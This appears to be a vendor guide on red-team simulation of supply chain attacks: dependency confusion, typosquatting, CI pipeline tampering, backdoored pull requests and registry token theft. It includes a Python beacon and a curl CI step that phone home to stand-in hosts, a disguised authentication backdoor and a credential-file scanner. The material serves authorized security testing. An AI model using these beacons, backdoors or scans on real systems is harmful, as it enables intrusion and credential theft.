Red teams exist to find the gaps that blue teams and automated tools miss. With software supply chain attacks becoming one of the most effective intrusion vectors available to real adversaries, it's past time for red teams to incorporate supply chain attack simulation into their engagements.
This isn't theoretical. The techniques described here mirror what threat actors actually use. The difference is that you're using them in a controlled environment with proper authorization to find weaknesses before someone else does.
Why Red Team Supply Chain Attacks
Traditional red team engagements focus on network penetration, social engineering, and endpoint compromise. These are valuable, but they miss an entire class of attacks that bypass perimeter and endpoint defenses entirely.
A supply chain attack doesn't need to get past your firewall. It arrives as a legitimate software update, a trusted package download, or an approved dependency. It's already inside your trust boundary by the time it executes.
If your red team isn't testing these scenarios, your organization has a significant blind spot in its security validation program.
Pre-Engagement Planning
Supply chain red team exercises require more careful planning than standard engagements. The potential for collateral damage is higher, and the scope needs to be precisely defined.
Rules of Engagement
At minimum, the rules of engagement should address:
- Target scope: Which internal packages, registries, and build systems are in scope?
- Escalation limits: How far can the red team go in compromising shared infrastructure?
- Safe words and rollback: Procedures for immediately stopping the exercise if something goes wrong.
- Internal vs. external packages: Is the team authorized to publish packages to public registries (with appropriate safeguards)?
- Notification list: Who needs to know about the exercise to prevent incident response teams from wasting time on a drill?
Threat Model Alignment
Base your simulations on realistic threat models. Study recent supply chain attacks—SolarWinds, Codecov, ua-parser-js, event-stream—and model your scenarios on the techniques that actually worked. There's no value in simulating an attack that no real adversary would attempt.
Attack Scenarios
Scenario 1: Dependency Confusion
Objective: Test whether the organization's package resolution is vulnerable to dependency confusion attacks.
Technique: Identify internal package names by analyzing build configurations, error messages, or developer documentation. Register those names on public registries with higher version numbers, so that resolvers configured to prefer the highest available version pull the public decoy instead of the internal package.
Execution:
- Enumerate internal package names through reconnaissance (developer docs, GitHub repos, error messages, job postings that mention internal tools).
- Register matching package names on npm, PyPI, or other relevant public registries.
- Include benign callback code that phones home to a red team server with environment details.
- Wait for build systems to pull the public package instead of the internal one.
- Document which systems were compromised and how quickly (or whether) it was detected.
Safety controls: The package should contain only callback/beacon code—no destructive payloads. Use unique identifiers so you can track which systems resolved the package.
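The beacon described above can be sketched as a small Python module. Everything here is illustrative: the collection URL, the package identifier, and the field names are invented for the exercise, and the code gathers only identification data, never secrets.

```python
import json
import os
import socket

# Hypothetical engagement identifiers -- replace with your own.
BEACON_URL = "https://redteam.example.com/beacon"   # authorized collection server
PACKAGE_ID = "depconf-internal-utils-0001"          # unique per published decoy

def collect_beacon() -> dict:
    """Gather non-sensitive environment details so the red team can
    identify which build system resolved the decoy package."""
    return {
        "package_id": PACKAGE_ID,
        "hostname": socket.gethostname(),
        "user": os.environ.get("USER") or os.environ.get("USERNAME") or "unknown",
        "cwd": os.getcwd(),
        "ci": os.environ.get("CI", ""),  # most CI systems set CI=true
    }

def send_beacon() -> None:
    """Phone home over HTTPS with identification data only."""
    import urllib.request
    data = json.dumps(collect_beacon()).encode()
    req = urllib.request.Request(
        BEACON_URL, data=data, headers={"Content-Type": "application/json"}
    )
    urllib.request.urlopen(req, timeout=5)

if __name__ == "__main__":
    # In a real decoy package this would run from setup.py or a
    # postinstall hook; here we just show the collected fields.
    print(json.dumps(collect_beacon(), indent=2))
```

In a published decoy, the unique `PACKAGE_ID` is what lets you map callbacks back to the specific internal name that was confused, which systems resolved it, and how long detection took.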
Scenario 2: Typosquatting
Objective: Test whether developers or automated systems would install a package with a name similar to a legitimate dependency.
Technique: Publish packages with names that are common misspellings or variations of popular packages used in the organization.
Execution:
- Identify the most commonly used packages across the organization's codebases.
- Generate plausible typosquats (character transpositions, missing hyphens, pluralization).
- Publish packages with beacon code and wait for installations.
- Optionally, combine with social engineering by posting "helpful" installation commands with typosquatted names in internal channels.
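Generating the candidate names in step two is easy to automate. A minimal sketch covering the three transformations mentioned above (transpositions, removed hyphens, pluralization); a real engagement would add more classes, such as substituted look-alike characters:

```python
def typosquat_candidates(name: str) -> set[str]:
    """Generate plausible typosquats of a package name."""
    candidates = set()
    # Adjacent character transpositions: "requests" -> "reqeusts"
    for i in range(len(name) - 1):
        swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
        if swapped != name:
            candidates.add(swapped)
    # Missing hyphens: "event-stream" -> "eventstream"
    if "-" in name:
        candidates.add(name.replace("-", ""))
    # Pluralization / singularization: "request" <-> "requests"
    if name.endswith("s"):
        candidates.add(name[:-1])
    else:
        candidates.add(name + "s")
    return candidates
```

Before publishing, check each candidate against the registry: names that already exist may be legitimate packages (or someone else's squat) and are out of scope.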
Scenario 3: Compromised Build Pipeline
Objective: Test the integrity of the CI/CD pipeline against insider threats or compromised credentials.
Technique: Use provided credentials (simulating a compromised developer account) to modify build configurations and inject code during the build process.
Execution:
- Access the CI/CD system with the provided credentials.
- Modify build scripts to include a beacon that activates in the built artifact.
- Ensure the modification is subtle—buried in a legitimate-looking configuration change.
- Track whether the change passes code review and whether the beacon activates in staging or production.
- Document the detection (or non-detection) timeline.
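As a hypothetical illustration of what "subtle" means in step two, consider a CI step written in GitHub Actions syntax. The step name, workflow structure, and metrics endpoint are all invented for the exercise; the point is that the beacon hides inside an otherwise routine-looking change.

```yaml
# Hypothetical CI step. To a reviewer, this diff reads as a caching
# tweak plus a metrics upload; the curl line is the red team beacon.
- name: Restore dependency cache
  run: |
    npm ci --prefer-offline
    # Disguised as routine build telemetry; sends only a run identifier.
    curl -s -X POST "https://metrics.example-redteam.com/v1/build" \
      -d "build=$GITHUB_RUN_ID" || true
```

Burying the beacon in a multi-line `run` block alongside a legitimate command is exactly the pattern used in real pipeline compromises: reviewers approve the visible intent and skim the rest.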
Scenario 4: Malicious Contribution
Objective: Test the code review process for its ability to detect subtle malicious changes submitted as seemingly legitimate contributions.
Technique: Submit pull requests to internal repositories that contain hidden malicious functionality alongside legitimate improvements.
Execution:
- Identify an internal open-source project or shared library that accepts contributions.
- Submit a pull request that includes a genuine bug fix or feature alongside a subtle backdoor.
- The backdoor should be non-obvious—perhaps a logic change that creates a bypass condition under specific inputs, or a dependency addition that seems reasonable but contains a beacon.
- Track whether code reviewers catch the malicious component.
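One concrete shape such a backdoor can take is a comparison change that survives a casual diff review. The function names and token format below are invented; the sketch contrasts a correct constant-time token check with a "refactored" version from the hypothetical pull request:

```python
import hmac

def verify_token(provided: str, expected: str) -> bool:
    """Correct check: constant-time equality."""
    return hmac.compare_digest(provided.encode(), expected.encode())

def verify_token_patched(provided: str, expected: str) -> bool:
    """Version from the hypothetical PR. The diff reads as a
    simplification, but substring containment replaces equality:
    any value that merely *contains* the expected token verifies."""
    return expected in provided  # backdoor: "x" + expected + "x" passes
```

A one-token change like `==` to `in` (or a dropped `not`) is easy to miss in a pull request that also contains a genuine fix, which is precisely what this scenario is measuring.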
Scenario 5: Registry Credential Theft
Objective: Test the security of package registry credentials and tokens.
Technique: Attempt to extract npm tokens, PyPI credentials, or other registry authentication material from build systems, developer workstations, or configuration files.
Execution:
- Search CI/CD environment variables for registry tokens.
- Scan internal repositories for accidentally committed .npmrc files, pip.conf files, or similar credential stores.
- Check developer workstations (if in scope) for cached credentials.
- If credentials are obtained, demonstrate impact by publishing a benign test package to the registry.
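The repository scan in step two can be sketched as a small walker. The file names and regexes below are illustrative, not exhaustive; a real engagement would cover more stores (Docker configs, shell history, `.pypirc`) and entropy-based token detection:

```python
import re
from pathlib import Path

# Common registry credential stores and token patterns (illustrative).
CREDENTIAL_PATTERNS = {
    ".npmrc": re.compile(r"_authToken\s*=\s*(\S+)"),
    "pip.conf": re.compile(r"password\s*=\s*(\S+)"),
    ".pypirc": re.compile(r"password\s*[:=]\s*(\S+)"),
}

def scan_for_registry_credentials(root: str) -> list[tuple[str, str]]:
    """Walk a repository tree and report files that appear to contain
    registry credentials. Returns (path, matched fragment) pairs."""
    findings = []
    for filename, pattern in CREDENTIAL_PATTERNS.items():
        for path in Path(root).rglob(filename):
            try:
                text = path.read_text(errors="ignore")
            except OSError:
                continue
            for match in pattern.finditer(text):
                findings.append((str(path), match.group(0)))
    return findings
```

Matched fragments should be redacted in the final report; the finding is the file's existence and location, not the token itself.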
Post-Exploitation Scenarios
If initial supply chain compromise succeeds, demonstrate the downstream impact:
- Lateral movement: Show how a compromised dependency can be used to pivot to other systems.
- Data exfiltration: Demonstrate that a malicious dependency could extract secrets, tokens, or source code from the build environment.
- Persistence: Show how supply chain access can be maintained across updates and redeployments.
Measuring Success
Supply chain red team exercises should measure:
- Detection rate: How many of the simulated attacks were detected by existing security controls?
- Detection time: How long between the attack and its detection?
- Response effectiveness: Once detected, how quickly and completely was the attack remediated?
- Scope of impact: How many systems or environments were affected before detection?
- Process gaps: Which policies or procedures failed to prevent the attack?
Reporting and Remediation
Red team findings should be specific and actionable. For each successful attack scenario, the report should include:
- The exact technique used and why it succeeded
- Which controls should have detected or prevented the attack
- Specific, prioritized recommendations for remediation
- Evidence of impact (beacon callbacks, screenshots, compromised artifacts)
- Recommendations for ongoing detection capabilities
Building Internal Capability
Not every organization can hire an external red team for supply chain exercises. Building internal capability requires:
- Training existing red team members on software supply chain concepts
- Investing in tooling for package analysis, registry monitoring, and build system testing
- Maintaining an updated library of attack techniques based on real-world incidents
- Running exercises regularly enough to validate that remediation efforts are working
How Safeguard.sh Helps
Safeguard.sh strengthens the blue team side of supply chain red team exercises. The platform provides continuous dependency monitoring, SBOM analysis, and vulnerability correlation that serve as the detection layer red teams are testing against. Organizations can measure their detection improvements after each exercise by tracking how quickly Safeguard.sh surfaces the indicators of simulated attacks—new dependencies, unexpected package sources, and anomalous changes in the dependency tree.